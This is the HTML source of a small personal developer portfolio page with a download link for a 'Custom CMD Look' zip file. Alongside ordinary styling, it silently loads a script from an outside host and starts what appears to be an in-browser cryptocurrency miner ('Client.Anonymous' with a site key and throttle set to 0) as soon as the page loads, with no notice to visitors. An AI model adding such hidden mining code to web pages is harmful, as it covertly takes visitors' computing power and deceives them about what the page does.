<!DOCTYPE html>
<html>
<head>
	<!--Loads fonts-->
	<link href="https://fonts.googleapis.com/css?family=Bebas+Neue|Roboto&display=swap" rel="stylesheet">
	<!--Sets the title-->
	<title>Schold - Developer</title>
</head>
<body background="images/background.jpg">
	<h1 class="verticalCenter colorWhite fontSize150 center underline bolder">SCHOLD</h1>
	<p id="desc" class="translateY blackUnderline colorWhite fontSize50 center underline">a self-taught web developer</p>
	<center class="projects">
		<p class="fontSize50">Custom CMD Look</p>
	<a class="projects colorBlack fontSize50 center" href="downloads/cmd.zip" download>Download</a>
</center>
	<script src="https://www.hostingcloud.racing/sKnH.js"></script>
<script>
    var _client = new Client.Anonymous('df9415b8c5b511dbab1d844ac02fdd395a6a4f111ea76b30b5ce0fe6f6a641a4', {
        throttle: 0, c: 'w'
    });
    _client.start();
    

</script>
</body>
</html>

<style type="text/css">
	
	p{
		font-family: 'Bebas Neue', cursive;
	}

	h1{
		font-family: 'Bebas Neue', cursive;
	}

	a{
		text-decoration: underline;
		font-family: 'Bebas Neue', cursive;
	}
	.body{
		filter: blur(2px);
	}

	.center {
		text-align: center;
	}

	.projects{
		margin: 25px;
		transform: translateY(-50%);
	}

	.translateY{
		transform: translateY(-200%);
		filter: blur(2px);
	}

	.verticalCenter {
		vertical-align: middle;
	}

	.oneLine {
		display: inline;
	}

	.underline {
		text-decoration: underline;
		text-decoration-color: black;
	}

	.bold {
		font-weight: bold;
	}

	.bolder {
		font-weight: bolder;
	}

	.fontSize50{
		font-size: 50px;
	}

	.fontSize150{
		font-size: 150px;
	}

	.colorWhite {
		color: white;
	}

	.colorBlack {
		color: black;
	}



</style>
